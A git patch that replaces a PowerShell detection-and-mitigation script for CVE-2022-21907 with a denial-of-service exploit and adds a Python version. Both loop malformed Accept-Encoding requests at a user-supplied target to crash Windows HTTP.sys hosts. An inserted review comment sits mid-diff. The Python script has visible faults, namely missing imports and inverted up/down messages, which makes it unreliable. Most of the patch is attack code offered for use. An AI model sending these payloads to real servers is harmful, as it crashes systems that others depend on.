From 0672dc0ccc1524313fbf9744b70aa3b635a700d1 Mon Sep 17 00:00:00 2001
From: mauricelambert <50479118+mauricelambert@users.noreply.github.com>
Date: Wed, 19 Jan 2022 13:22:29 +0100
Subject: [PATCH] Add powershell and python exploit
---
 CVE-2022-21907.ps1 | 57 +++++++++++++++++++++----------
 CVE202221907.py | 85 ++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 124 insertions(+), 18 deletions(-)
 create mode 100644 CVE202221907.py
diff --git a/CVE-2022-21907.ps1 b/CVE-2022-21907.ps1
index d69b6bc..890d002 100644
--- a/CVE-2022-21907.ps1
+++ b/CVE-2022-21907.ps1
@@ -1,5 +1,5 @@
-###################
-# Detect and protect CVE-2022-21907.
+###################
+# This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
 # Copyright (C) 2022 Maurice Lambert
 
 # This program is free software: you can redistribute it and/or modify
@@ -16,23 +16,44 @@
 # along with this program. If not, see .
 ###################
 
-$license="GPL-3.0 License"
+[CmdletBinding()]
+param(
+ [Parameter(Mandatory)]
+ [string] $target
+)
 
-Write-Host "
+$license = "GPL-3.0 License"
+$copyright = @"
 CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
 This program comes with ABSOLUTELY NO WARRANTY.
 This is free software, and you are welcome to redistribute it
-under certain conditions.
-"
-
-# Only detect
-
-$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and $(Write-Host "$env:computername vulnerable to CVE-2022-2190 !")
-
-$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 !"}else{echo "Not vulnerable to CVE-2022-2190"}
-
-# With protection
-
-$ErrorActionPreference="SilentlyContinue";$key=Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport;if($key -AND $key.EnableTrailerSupport -ne 0){echo "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0";Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0}else{echo "Not vulnerable to CVE-2022-2190"}
-
-$ErrorActionPreference="SilentlyContinue";$_=($(Get-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport).EnableTrailerSupport -or $(Write-Host "Not vulnerable to CVE-2022-2190")) -and ($(Write-Host "$env:computername vulnerable to CVE-2022-2190 ! Change EnableTrailerSupport value to 0") -or $(Set-ItemProperty -Path HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\ -Name EnableTrailerSupport -Value 0))
+under certain conditions.
+"@
+
+write $copyright
+
+$session = New-Object Microsoft.PowerShell.Commands.WebRequestSession
+$session.UserAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Edg/97.0.1072.62"
+
+$headers = @{
+ "Cache-Control"="max-age=0"
+ "sec-ch-ua"="`" Not;A Brand`";v=`"99`", `"Microsoft Edge`";v=`"97`", `"Chromium`";v=`"97`""
+ "sec-ch-ua-mobile"="?0"
+ "sec-ch-ua-platform"="`"Windows`""
+ "Upgrade-Insecure-Requests"="1"
+ "Accept"="text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"
+ "Sec-Fetch-Site"="none"
+ "Sec-Fetch-Mode"="navigate"
+ "Sec-Fetch-User"="?1"
+ "Sec-Fetch-Dest"="document"
+ "Accept-Encoding"="AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,"
+ "Accept-Language"="fr,fr-FR;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6"
+ "If-None-Match"="`"ef66c67b14dd81:0`""
+ "If-Modified-Since"="Wed, 19 Jan 2022 09:11:03 GMT"
+}
+
+
+$ErrorActionPreference="Stop"
+while(1) {
+ Invoke-WebRequest -UseBasicParsing -Uri "http://$target/" -WebSession $session -Headers $headers
+}
\ No newline at end of file
diff --git a/CVE202221907.py b/CVE202221907.py
new file mode 100644
index 0000000..3e2ecbb
--- /dev/null
+++ b/CVE202221907.py
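Review bot: The new header comment `# This script exploit the CVE-2022-21907 ...` drops the only statement of what makes a host affected and how to harden it — the removed one-liners read `EnableTrailerSupport` under `HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\` and reset it with `Set-ItemProperty ... -Value 0` — so a reader of this file alone no longer learns which configuration is at risk or what the remediation is. I would keep that as one header line, e.g. `# Affected only while HKLM:\System\CurrentControlSet\Services\HTTP\Parameters\EnableTrailerSupport is non-zero; setting it to 0 is the mitigation (the previous revision of this file checked and applied it).` The header should also read `# This script exploits CVE-2022-21907 for a DoS ...`; the Python module docstring added in this same patch repeats the wording. The `[string] $target` parameter is documented only by its name; a comment-based help block with `.PARAMETER target` above `[CmdletBinding()]` should state what it is expected to hold, which the `"http://$target/"` URI shows is a host reached over plain HTTP.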
@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+"""
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
+
+>>> import CVE202221907
+
+~# python3 CVE202221907.py
+"""
+
+###################
+# This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
+# Copyright (C) 2022 Maurice Lambert
+
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see .
+###################
+
+__version__ = "1.0.0"
+__author__ = "Maurice Lambert"
+__author_email__ = "mauricelambert434@gmail.com"
+__maintainer__ = "Maurice Lambert"
+__maintainer_email__ = "mauricelambert434@gmail.com"
+__description__ = """
+This script exploit the CVE-2022-21907 for a DOS (Denial of Service) attack (Blue Screen).
+"""
+license = "GPL-3.0 License"
+__url__ = "https://github.com/mauricelambert/CVE-2022-21907"
+
+copyright = """
+CVE-2022-21907 Copyright (C) 2022 Maurice Lambert
+This program comes with ABSOLUTELY NO WARRANTY.
+This is free software, and you are welcome to redistribute it
+under certain conditions.
+"""
+__license__ = license
+__copyright__ = copyright
+
+__all__ = []
+
+print(copyright)
+
+from urllib.request import Request, urlopen
+from sys import exit, stderr
+
+host = input("Target: ")
+
+headers = {
+ "Accept-Encoding": 'AAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA&AA&**AAAAAAAAAAAAAAAAAAAA**A,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,AAAAAAAAAAAAAAAAAAAAAAAAAAA,****************************AAAAAA, *, ,'
+}
+
+try:
+ response = urlopen(f"http://{host}")
+except (URLError, HTTPError) as e:
+ pass
+except Exception as e:
+ print(f"http://{host} is not DOWN.")
+ print(f"{e.__class__}: {e}", file = stderr)
+ exit(1)
+
+print(f"http://{host} is not UP. Start hacking...")
+
+while True:
+ try:
+ response = urlopen(Request(f"http://{host}", headers=headers))
+ except TimeoutError as e:
+ print(f"http://{host} is not DOWN. {host} is vulnerable to CVE-2022-21907.")
+ exit(0)
+ except (URLError, HTTPError) as e:
+ pass
+ except Exception as e:
+ print(f"{e.__class__}: {e}")
+
+ print(f"Payload sent successfully. Try new request...")